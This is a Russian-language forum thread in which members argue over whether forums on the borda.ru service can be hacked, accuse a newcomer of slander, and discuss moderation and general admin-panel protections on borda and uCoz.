Сентябрьский Лис: Gabi Kaufmann пишет: А зачем майбб оскорблять? Я борду не оскорбляла. Оскорбляли, милая, оскорбляли. Вот пример: Gabi Kaufmann пишет: а на борде одни скандалы. Источник http://septemberfox.forum24.ru/?1-1-0-00000067-000-0-0#002.001.001.001 А мы, между прочим, на Ваше оскорбление нашего сервиса ни единого замечания Вам не сделали, демонстрируя своим поведением, что тут как раз наоборот - скандалист пришёл с Mybb. И тут на борде - как раз очень терпеливые к вам, Mybb'овцам, люди. Gabi Kaufmann пишет: Взломать могут любой форум на любом сервисе, и дети, и не дети. Любой - могут, а Борду не могу. Тем она и держится. Gabi Kaufmann пишет: Вы намекаете что я ребенок и круглыми днями ломаю борду?)) Нет, я не намекаю, а прямо пишу, что Вы солгали, написав: "Могу привести массу реальных случаев, когда дети взламывали борду ( и именно борду, а не какой-либо другой сервис)". Источник Ни массы случаев, ни одного случая Вы привести не сможете - это ложь. Да, профессиональный программист, уровня ЦРУ, сможет взломать, но не мой форум отдельно, а весь сервис borda, принадлежащий case. Но никакой ребёнок, отдельно форум "Сентябрьский Лис" не взломает. Gabi Kaufmann пишет: Уж извините, айпи этих детей у меня нет, но по-поведению это были либо подростки, либо крайне непосредственные неуравновешенные люди.)) Зачем мне - Ай-пи??? От Вас просили рассказ о взломе. Рассказ. Разве Ай-пи - это рассказ? Вы же написали: «Могу привести массу реальных случаев...» Вы же не написали: «Могу привести массу реальных Ай-пи» Вот мы случаев и ждем-с! Да нет, не ждём, конечно же, т.к. их нет. Есть только ложь и оскорбление чужого сервиса.
McNamara: Gabi Kaufmann пишет: Уж извините, айпи этих детей у меня нет Так Вы приведите реальные адреса реальных форумов на борде, которые кто-то взломал))) Никаких ай-пи с Вас никто и не требует. Тем более, что по ай-пи, точно так же, как по паспортным данным, нельзя определить, террорист взломщик человек или не взломщик))
Gabi Kaufmann: Сентябрьский Лис пишет: А мы, между прочим, на Ваше оскорбление нашего сервиса ни единого замечания Вам не сделали, демонстрируя своим поведением, что тут как раз наоборот - скандалист пришёл с Mybb. И тут на борде - как раз очень терпеливые к вам, Mybb'овцам, люди. Ну это можно оспорить. Сентябрьский Лис пишет: Зачем мне - Ай-пи??? От Вас просили рассказ о взломе. Рассказ. Разве Ай-пи - это рассказ? Вы же написали: «Могу привести массу реальных случаев...» Вы же не написали: «Могу привести массу реальных Ай-пи» Вот мы случаев и ждем-с! Да нет, не ждём, конечно же, т.к. их нет. Есть только ложь и оскорбление чужого сервиса. McNamara пишет: Так Вы приведите реальные адреса реальных форумов на борде, которые кто-то взломал))) Никаких ай-пи с Вас никто и не требует. Тем более, что по ай-пи, точно так же, как по паспортным данным, нельзя определить, террорист взломщик человек или не взломщик)) Голословным высказываниям никто не поверит, но на моей памяти много взломанных бордовских ролевых.. И я никому не угрожаю, не говорю что могут взломать ваш форум, не говорю что майбб идеальна, или идеален укоз, не говорю что борда ненадежна, и взломать ее может даже ребенок. Я не на что не намекаю и никого не оскорбляю, и не знаю что вы там себе напридумывали. Просто какое-то время я сидела на борде, будучи еще подростком. Там были наши подростковые игры, довольно посредственные ролевки, где все ссорились из-за малейшего кусочка дизайна обвиняя друг-друга в плагиате.. Так вот, тогда, 4 года назад я общалась с девочкой, на которую пошли такие "наезды", что форум взломают, из-за того, что она якобы украла дизайн (причем дизайн делала не она, а вообще сторонний человек, имеющий свой сайт по дизайну, поэтому красть он просто не мог.) Нападки продолжались и ролевую взломали (причем взломали подростки, которые с ней ссорились, так ролевая ее была откровенно плохонькая по нынешним меркам). Кроме того, частенько, когда хожу по борде, вижу надпись:"Игрулька взломана". Я не знаю каким методом взломали эти ролевые, обдурив администратора или как то еще. Я не могу дать адресов форумов, так как это дело не сохраняла, прошлое уже достаточное количество времени и их давно снесли. Вы можете мне не верить, так как все написанное выше мой личный опыт и мое субъективное мнение. И вообще, давайте завершим этот спор, и ежу понятно, что у каждого сервиса есть свои недостатки и достоинства.Что есть хакеры, которые занимаются этим делом годами, есть дети, которые балуются, но знают не по детски много, есть масса способов обдурить админа, есть те же, надоевшие всем до боли джава скрипты и прочее.
McNamara: Gabi Kaufmann Вам бы, возможно, следовало признать, что другие люди тоже исходят из своего личного опыта и тоже могут оказаться правы) Я на Борде уже 3 года и не помню ни одного раза, чтобы её ломали, если сам админ не дал доступ до ПА другому человеку (то есть, имел место не взлом как таковой, а раззявистость админа). То же самое Вам скажут на техподдержке борды - и это правда))) Кстати, наберите, если не лень, в поисковой строке "взломать форум borda". Вы попадёте по поисковику на форумы настоящих взломщиков и почитаете, что они пишут по этому поводу)))
Gabi Kaufmann: McNamara Ну вот, мы и пришли наконец-то к сути делемы. Вы имеете свое мнение, я свое. Я же не говорю что я великая, живу на свете триста лет, гений в программировании и знаю борду как свои пять пальцев. Знаете, как некоторые говорят:"Я не люблю лук." Спрашивают:"Почему не любишь?" "Не люблю и все." Каждый человек имеет право иметь собственное мнение, не соглашаться с мнением других людей, и тд.Это и есть свобода выбора.А вы мне словно предлагаете перекроить свои взгляды. Я лишь высказала свою точку зрения-не более того.А уж верить вам моим словам, не верить-ваше личное дело.Каждый решает сам для себя.
McNamara: Gabi Kaufmann Я всего лишь призываю Вас не утверждать категорично что-либо, если Вы не можете подтвердить это фактически) Мнение - это мнение, а заявление о том, что Gabi Kaufmann пишет: на моей памяти много взломанных бордовских ролевых. - это уже конкретное указание на то, что Вы лично видели эти взломанные форумы. Либо клевета. В первом сообщении этой темы очень подробно описано, как именно состоялся взлом. Если Вы не можете ни привести адреса взломанных форумов борда, ни рассказать, что именно произошло на этих "взломанных"форумах, я бы на Вашем месте не стал делать категоричные заявления. За каждым категоричным заявлением должен быть фактический материал. Кстати, действительно очень советую ознакомиться с вопросом, набрав в любом поисковике (гугле например) строчку "Взломать форум borda". Очень интересно))))
Beastmaster: Gabi Kaufmann Ну вот потому и не верим. Потому что знаем на собственном примере. Потому что любой форум на Борде взломать можно только если админ это позволит. PS ну зайдите на форум техподдержки, оттуда примеры возьмите что ли
Gabi Kaufmann: McNamara Beastmaster свое мнение я высказала, это мое мнение.Добавить мне нечего.Хостингом борда не пользуюсь.
Сентябрьский Лис: Gabi Kaufmann пишет: Каждый человек имеет право иметь собственное мнение, не соглашаться с мнением других людей, и тд. Да. Каждый человек имеет право иметь собственное мнение. Но это не значит, что каждый человек имеет права распространять клевету. Вас никто не заставляет менять ваше мнение. Имейте его на здоровье! Но Вы тут распространяете клевету на сервис Borda, вы распространяете заведомую ложь. И если Вы не возьмёте свои слова по поводе того, что "но на моей памяти много взломанных бордовских ролевых" - которых на самом деле нет - я Вам поставлю в ЛЗ звание "Лгунья", ибо, то, что Вы лгунья - чистая правда. Gabi Kaufmann пишет: Кроме того, частенько, когда хожу по борде, вижу надпись:"Игрулька взломана". Не будьте ребёнком, эта фраза означает, что админ того форума поставил вторым админом непроверенного человека и тот снёс ему форум. Форум на borda можно "взломать" только таким способом. Но это не взлом по своей сути, а просто доверие статуса администратора кому попало. Поэтому и case выносит в основное правило: "Один форум - один админ" Выполняй это правило - и твой форум на Борде никогда не будет взломан. Gabi Kaufmann, лучше бы вы не говорили о том, чего не знаете. Ваше поведение оскорбительно для других участников форума.
Beastmaster: Gabi Kaufmann а я и не призываю. Особенно если собеседница говорит очевидную ложь. Как и я не пользуюсь МайББ и не собираюсь. Уж лучше платный сайт открыть, и платить за него, если понадобится больше 19 разделов, чем грузиться в этот детский сад. PS Есть ещё что рассказать о взломе и способах? Дабы не оффтопить.
Gabi Kaufmann: Сентябрьский Лис пишет: Да. Каждый человек имеет право иметь собственное мнение. Но это не значит, что каждый человек имеет права распространять клевету. Вас никто не заставляет менять ваше мнение. Имейте его на здоровье! Но Вы тут распространяете клевету на сервис Borda, вы распространяете заведомую ложь. И если Вы не возьмёте свои слова по поводе того, что "но на моей памяти много взломанных бордовских ролевых" - которых на самом деле нет - я Вам поставлю в ЛЗ звание "Лгунья", ибо, то, что Вы лгунья - чистая правда. Ради Бога, ставьте.
Wanderer: Сентябрьский Лис пишет: А мы, между прочим, на Ваше оскорбление нашего сервиса ни единого замечания Вам не сделали, демонстрируя своим поведением, что тут как раз наоборот - скандалист пришёл с Mybb. И тут на борде - как раз очень терпеливые к вам, Mybb'овцам, люди. Чё это вы на нас наезжаете? Это мы-то скандалисты? Да я вам сейчас за майбб... На самом деле, сервис тут, конечно же, не при чём. А есть конкретные ситуации/люди на конкретных форумах/играх. И, кстати, у меня почему-то наоборот, сложилось обратное впечатление. На бб-шном Лисе как-то всё культурнее, а суда как ни зайду - все говорят довольно резким тоном (сам грешен), а то и похлеще. Gabi Kaufmann пишет: Ну вот, мы и пришли наконец-то к сути делемы. Вы имеете свое мнение, я свое. Я же не говорю что я великая, живу на свете триста лет, гений в программировании и знаю борду как свои пять пальцев. Знаете, как некоторые говорят:"Я не люблю лук." Спрашивают:"Почему не любишь?" "Не люблю и все." Каждый человек имеет право иметь собственное мнение, не соглашаться с мнением других людей, и тд.Это и есть свобода выбора.А вы мне словно предлагаете перекроить свои взгляды. Речь немного о другом. Если 2x2=4 , и я вас начну в этом убеждать, а вы мне скажете 2х2=5 , это будет значить, не что вы имеете своё мнение по данному вопросу, а что вы - безграмотны в данном вопросе. А вот на вопрос "любишь ли математику" точки зрения могут быть разные. Поэтому правильная аналогия не "почему не любишь лук?", а "лук - это ягода?". Отдельно взятый форум на борде либо могут взломать, либо нет. Как в программировании - True или False. Т.е. думать-то можно что угодно, но правильный вариант ответа на вопрос "могут ли взломать форум на борде" - один: либо да, либо нет. "И да, и нет" часто бывает в экономике и юриспруденции, но не тут. Поэтому мнения ваши с МакНамарой и Лисом могут быть разными, но прав - кто-то один. Кстати, Сентябрьский Лис , а почему на борде нельзя взломать форум? Бордой не пользовался никогда (душа не лежит), а посему не осведомлён, но хотелось бы знать. Gabi Kaufmann пишет: И вообще, давайте завершим этот спор, и ежу понятно, что у каждого сервиса есть свои недостатки и достоинства. По-моему самые золотые слова в этом топике.
Мэгги: М-да, что-то "рассказ о взломе" перерос в выяснение, "чей сервис круче" Конечно же, взломать можно абсолютно любой сайт, форум, что угодно. И для того, чтобы узнать, почему борду нельзя взломать, нужно обратиться к держателю сервиса. Сам он утверждает, что взломать нельзя. Цитата с Главной сервиса: Вас не смогут взломать через взлом форума. http://borda.ru/ Я в это верю хотя бы потому, что за почти три года на борде не видела ни одного взломанного форума. Видела, как и Лис, только такие, на которых сами админы допускали в настройки кого попало. Так что не верить Кейсу у меня нет нужды. По поводу майбб - ничего не скажу, потому что не знаю и имела с ним дело гораздо меньше. Может быть, его тоже взломать нельзя. Но утверждать этого не стану просто потому, что не знаю. По поводу юкоза тоже ничего не скажу. Своими глазами взломанных сайтов не видела. На юкозе есть очень хорошая защита от взлома, могу рассказать про неё. Во-первых, ник, с которым заходишь в ПА, совсем не тот, который у тебя на форуме. То есть, этот ник вообще никто не знает. Во-вторых, можно сделать так, чтобы одноврменно в АП мог находиться пользователь только с одним айпи. То есть, никто не сможет, даже при подмене куков, одновременно находиться в админпанели с хозяином сайта. В-третьих, если уж очень не хочется рисковать - можно закрепить ПА только за своим айпи (если он не динамический). Мне эта функция подходит как раз потому, что у меня статический айпи. Собственно, про юкоз никто не спрашивал. Но я хотела сказать, что утверждать голословно, что какой-либо сервис просто взломать и вокруг валяются взломанные форумы этого сервиса, всё-таки не стоит.
Сентябрьский Лис: Я - плохой администратор. Ещё три года назад меня так охарактеризовал один из участников форума, Sem: "Лис, он сначала такой мягкий-мягкий, а потом как развернётся, как размажет по стенке!" За три года Лис, наверное, ни в чём не изменился. Где не нужно, он "мягкий-мягкий", а потом, приходится размазывать по стенке, потому что в начале, как администратор не проявил необходимой твёрдости. Новая участница форума Gabi Kaufmann несколько раз допускала себе грубые высказывания, какие на данном форуме недопустимы. Вот несколько примеров, все я не привожу: Gabi Kaufmann пишет Шарлю: Оффтоп: ах вот вы где прохлаждаетесь?! А ну-ка марш в критику! Мы с вами еще не закончили. Источник Возможно, для самого Шарля это не показалось грубым - это его личное дело. Но такое обращение друг к другу не свойственно на данном форуме. Gabi Kaufmann пишет: а на борде одни скандалы. Источник Это пришёл говорить человек на форум, находящийся на сервисе borda. Тем более это клевета: как тут могут быть одни скандалы, когда на Броде масса Историчек, и просто форумов при крупных сайтах, хозяева которых предпочитают заводить форум на borda, а ни на каком другом, по известным причинам. В результате попустительства с моей стороны, участник дошёл до откровенной клеветы: Gabi Kaufmann пишет: Могу привести массу реальных случаев, когда дети взламывали борду ( и именно борду, а не какой-либо другой сервис). Причина того что произошло - во мне. Лис плохой администратор и не смог, где это было необходимо сразу проявить должную твёрдость. И потому теперь - необходимая мера - размазывать по стенке. Очень грустно. Может быть, со временем я научусь должным образом администрировать форум (и не только этот). На самом деле, мне сразу резануло глаза поведение нового участника, но... почему-то я не вмешался. Хотя первая мысль была именно такой: вмешаться и объяснить, что здесь не принято такое обращение. А вторая мысль была: "Ну может она сама поймёт, что погорячилась, и вообще она тут сама писала, что навеселе все эти дни..." Нет! Не поймёт ничего участник сам. Если бы все всё сами понимали - ни администраторы, ни модераторы были бы не нужны ни на каком форуме. А они всё же нужны. Wanderer пишет: Кстати, Сентябрьский Лис, а почему на борде нельзя взломать форум? Бордой не пользовался никогда (душа не лежит), а посему не осведомлён, но хотелось бы знать. Wanderer, вот Вы сами, как думаете, что Вы написали? Вот я сейчас должен срочно бежать, изучить php, ява-скрипт, изучить досконально форум borda, проконсультироваться со специалистами и составить Вам понятный и доступный ликбез по этому вопросу. Хорошо, я могу это сделать. Но, как Вы понимаете, не бесплатно. Это ведь работа и достаточно серьёзная. Если Вам, как Вы пишете, хотелось бы это знать - Вы и должны поискать ответ на этот вопрос. Самостоятельно. Пройдитесь по техподдержкам различных сервисов, по хакерским форумам (их предостаточно в сети), проконсультируйтесь со своими личными друзьями-вундеркиндами по этому вопросу. В принципе и я могу это сделать для Вас. Но, даже репетитор математики младших классов стоит денег. А тут работа более трудная, чем математика младших классов. Из объективного могу сказать: обычно среднестатистический бесплатный форум ломают, взломав почтовый ящик админа и выслав туда пароль с форума. case убрал эту возможность на borda. Никакой администратор не может выслать себе пароль на почтовый ящик. И соответственно, хакер тоже. Это только один из пунктов защиты borda. Извинете, Wanderer, я очень груб.
Шарль: Сентябрьский Лис пишет: Возможно, для самого Шарля это не показалось грубым - это его личное дело. Но такое обращение друг к другу не свойственно на данном форуме. Показалось. Но очень не хотелось как-то комментировать ни приведенную вами в качестве примера фразу, ни некоторые другие - по двум причинам: - не хотелось затевать выяснение отношений на форуме, где мне в целом оказалось неожиданно уютно находиться; - я человек мирный, пока очень сильно не достанут. Я понимаю, везде есть неадекватные личности, не понимающие, где граница шутки и грубости, и лучший способ с ними бороться, если нет спецсредств воздействия - просто игнорировать. Простите за оффтоп, больше не буду )
McNamara: Шарль пишет: лучший способ с ними бороться, если нет спецсредств воздействия - просто игнорировать. Правильно! Участникам, в подобном случае, лучше всего игнорировать грубость другого участника, но админ это игнорировать не должен! На то он и админ. Dixi! Лис! Прошу прощения за смелую критику снизу (пользуясь тем, что я здесь - не админ и даже не модер))))
Wanderer: Сентябрьский Лис пишет: Тем более это клевета: как тут могут быть одни скандалы, когда на Броде масса Историчек, и просто форумов при крупных сайтах, хозяева которых предпочитают заводить форум на borda, а ни на каком другом, по известным причинам. Вот тут вы откровенно цепляетесь к словам. Там ведь явно видно, что это общая, утрированная фраза. А вы её так растолковали. Вы, кстати, не следователь, не прокурор? Сентябрьский Лис пишет: А вторая мысль была: "Ну может она сама поймёт, что погорячилась, и вообще она тут сама писала, что навеселе все эти дни..." Нет! Не поймёт ничего участник сам. Позволю себе не согласится. И, кстати, госпожа Kaufmann в теме критики в конце концов успокоилась и написала адекватный, заканчивающий разборки, пост. Сентябрьский Лис пишет: Wanderer, вот Вы сами, как думаете, что Вы написали? Простите, Лис, а вы тогда понимаете, что Вы написали? Вы сказали, что борду нельзя взломать. Раз вы в этом уверены, значит знаете почему это так. Иначе уверенность беспочвенная (условно). Поэтому я и спросил вас (а не кого-то ещё) об этом. Естественно, я не ожидал подробной лекции и пояснения всех нюансов. Но в общих чертах - можно было написать. Вот, например, пример с ящиком - коротко и ясно. Ну да ладно. Сентябрьский Лис пишет: Извинете, Wanderer, я очень груб. У меня такое ощущение, что вы сейчас почему-то очень разозлились/расстроились (даже "извините" с ошибкой пишите), и срываетесь на мне. Хотя я тут вобщем-то не при чём. Ладно и с этим. Итог: предлагаю прекратить ВСЕМ участникам форума недостойное поведение (мне и Вам в том числе), которое наблюдается среди многих последние дни. А Габи Кауфманн разбаньте, если забанили. Сначала дают преды, а потом уже банят. Да и первый бан - не вечный, а, как правило, не больше недели.
Сентябрьский Лис: Извинете Извинете - это "Извинение в инете" )))) Wanderer пишет: А Габи Кауфманн разбаньте, если забанили. Я не банил её! Вот ещё! Единственное, чем я ей пригрозил - изгадить её ЛЗ. И то этого не осуществил, как видите. Wanderer пишет: Простите, Лис, а вы тогда понимаете, что Вы написали? Вы сказали, что борду нельзя взломать. Раз вы в этом уверены, значит знаете почему это так. Иначе уверенность беспочвенная (условно). Поэтому я и спросил вас (а не кого-то ещё) об этом. Да, я действительно так написал, признаю. Но для всех бордовцев это объективно. Это так же объективно (для бордовцев), как то, что солнце восходит на востоке, а не на западе. По поводу взлома. Форум техподдержки case много раз пытались взломать (у case характер - не сахар, поверьте. И врагов у него предостаточно, особенно среди подростков-вундеркиндов) но не взломали ни разу. Меня тоже пытались ломать, но реально взломали только тогда, когда я сам поставил в настройки скрипт для взлома (см. первое сообщение темы). У меня тоже есть друзья-вундеркинды (а не только у Gabi Kaufmann) так вот, эти друзья вундеркинды очень тщательно сканировали форумы, но не нашли ни единой лазейки. Более того, borda, как выяснилось, существует с 2001 года. И она не всегда была такой неуязвимой. Но после модернизации, которую провёл case, года два назад (не помню точно даты) она перестала иметь какие бы то ни было "лазейки", "форточки", "дыры" и пр. Подробнее нужно спрашивать у специалистов.
Wanderer: Вот, сразу бы так. Всё намного понятнее. Спасибо за информацию. Сентябрьский Лис пишет: Да, я действительно так написал, признаю. Но для всех бордовцев это объективно. Вы и так знали, что я не бордовец, но я об этом ещё и в своём посте сообщил (вместе с вопросом). А вобще вижу, что вы были в состоянии аффекта, когда писали тот пост. Поэтому я вас прощаю Давайте все будем уважительнее и терпимее относится друг к другу. (тут может быть подпись "Кот Леопольд" :))
NaU: очень тщательно сканировали форумы, но не нашли ни единой лазейки Однако, плохо сканировали... Все, что создано человеком, может быть им же взломано.
Сентябрьский Лис: NaU, ну в принципе, прогресс идёт дальше и всё в жизни меняется. NaU пишет: Все, что создано человеком, может быть им же взломано. Ну, в принципе, то, что конкретный человек создал, он же конкретно и может взломать. Т.е. case, я думаю, запросто взломает свою Борду.
McNamara: NaU пишет: Все, что создано человеком, может быть им же взломано Да, безусловно, case борду взломает в два счёта Свой же сервис)))
Сентябрьский Лис: Сентябрьский Лис пишет: для всех бордовцев это объективно. Wanderer пишет: Вы и так знали, что я не бордовец, но я об этом ещё и в своём посте сообщил (вместе с вопросом). Я вообще-то себя подразумевал под бордовцем. Т.е. мне, как бордовцу, это было просто объективно. Во попробуйте обыкновенного человека заставить объяснить Вам почему именно солнце восходит на Востоке, а не на Западе - он тоже так сходу не объяснит.
Миледи2: Сентябрьский Лис Сентябрьский Лис пишет: Новая участница форума Gabi Kaufmann несколько раз допускала себе грубые высказывания, какие на данном форуме недопустимы. Вот несколько примеров, все я не привожу: Gabi Kaufmann пишет Шарлю: цитата: Оффтоп: ах вот вы где прохлаждаетесь?! А ну-ка марш в критику! Мы с вами еще не закончили. Источник Возможно, для самого Шарля это не показалось грубым - это его личное дело. Но такое обращение друг к другу не свойственно на данном форуме. Gabi Kaufmann пишет: цитата: а на борде одни скандалы. Источник Это пришёл говорить человек на форум, находящийся на сервисе borda. Тем более это клевета: как тут могут быть одни скандалы, когда на Броде масса Историчек, и просто форумов при крупных сайтах, хозяева которых предпочитают заводить форум на borda, а ни на каком другом, по известным причинам. В результате попустительства с моей стороны, участник дошёл до откровенной клеветы: Gabi Kaufmann пишет: цитата: Могу привести массу реальных случаев, когда дети взламывали борду ( и именно борду, а не какой-либо другой сервис). Мне бы меньшего хватило для нажатия одной кнопочки... И не думаю, что долго объясняла бы причину... Сентябрьский Лис пишет: Я не банил её! Вот ещё! Единственное, чем я ей пригрозил - изгадить её ЛЗ. И то этого не осуществил, как видите. ИМХО, я бы поступила по-другому... Но я все рано еще раз прошу прощения за сорвашиеся у меня слова о миббе. Мне неловко, что так получилось...
Сентябрьский Лис: Миледи2 пишет: Мне бы меньшего хватило для нажатия одной кнопочки... Вот-вот. А Лис всё мягкий, мягкий по началу.... Я и говорю: плохой Лис администратор!
McNamara: Сентябрьский Лис Лучше быть жёстким* в самом начале))) Тогда до размазывания по стенке не дойдёт))) * Жёстким - не значит, жестоким. Кстати, не раз наблюдал на больших форумах: один раз человек ляпнул грубость - ему админ - устное (то есть, письменное, но без "занесения в личное дело") замечание. Второй раз ляпнул - ему уже "с занесением в личное дело" - то бишь, красненькую галочку с пояснением. Ну, а если и в третий раз не исправился - ищи другой форум. Кстати, это справедливо, потому что атмосфера на форуме зависит от каждого участника, а не только от одного админа, или парочки завсегдатаев.
Cilla: Присоединяюсь к теме, т.к. у самой юкоз ) Мэгги пишет: Во-первых, ник, с которым заходишь в ПА, совсем не тот, который у тебя на форуме. То есть, этот ник вообще никто не знает. Но ведь чтобы получить доступ к входу в ПА, надо войти на сайт под админским ником. Если его уведут, то не сможешь добраться до самого входа в ПА. При таком уводе контроль над сайтом будет потерян полностью - и владельцем, и взломщиком, ведь так? Cilla, я Вам поменял автоподпись - теперь должно сработать. Нужно в неё ставить bb-коды, а не html Лис
Мэгги: Cilla пишет: Если его уведут, то не сможешь добраться до самого входа в ПА. При таком уводе контроль над сайтом будет потерян полностью - и владельцем, и взломщиком, ведь так? Не так. Эта информация есть на форуме техподдержки юкоза, поэтому пишу её в открытом доступе. Взломщикам она ничего кроме головной боли, не добавит. Набираете в адресной строке: http://адрес сайта/admin - и попадаете на страницу переадресации, с которой вход в ПА. Для взломщиков тут сложность в том, что ник для ПА - не тот, что для самого сайта. А подбирать ник и пароль - конечно, невозможного ничего нет, но гораздо сложнее, чем только пароль. Так что если вам взломали админский ник - просто входите в ПА, меняете ник и пароль, с которыми заходили на сайт - и взломщик автоматически вылетает. Всё просто.
Миледи2: Сентябрьский Лис пишет: Я и говорю: плохой Лис администратор! Вы замечательный админ! Не стоит заражаться моим сволочизмом
Миледи2: McNamara пишет: Лучше быть жёстким* в самом начале))) Тогда до размазывания по стенке не дойдёт))) * Жёстким - не значит, жестоким. Кстати, не раз наблюдал на больших форумах: один раз человек ляпнул грубость - ему админ - устное (то есть, письменное, но без "занесения в личное дело") замечание. Второй раз ляпнул - ему уже "с занесением в личное дело" - то бишь, красненькую галочку с пояснением. Ну, а если и в третий раз не исправился - ищи другой форум. Кстати, это справедливо, потому что атмосфера на форуме зависит от каждого участника, а не только от одного админа, или парочки завсегдатаев. Сентябрьский Лис Просто надо уметь пользоваться дисциплинарными мерами, как здесь написано. Но это уже оффтоп...
Сентябрьский Лис: Миледи2 пишет: Вы замечательный админ! Миледи2, спасибо! Миледи2 пишет: Но это уже оффтоп... В принципе - да. Я даже подумал, не отделить ли всё это в какую-нибудь тему, скажем, с названием: "Мнение участников форума о Лисе"
декабрьский колобок: Сентябрьский Лис пишет: Ни массы случаев, ни одного случая Вы привести не сможете - это ложь. Да, профессиональный программист, уровня ЦРУ, сможет взломать, но не мой форум отдельно, а весь сервис borda, принадлежащий case. Но никакой ребёнок, отдельно форум "Сентябрьский Лис" не взломает. Она может и не может, зато я могу. Привести?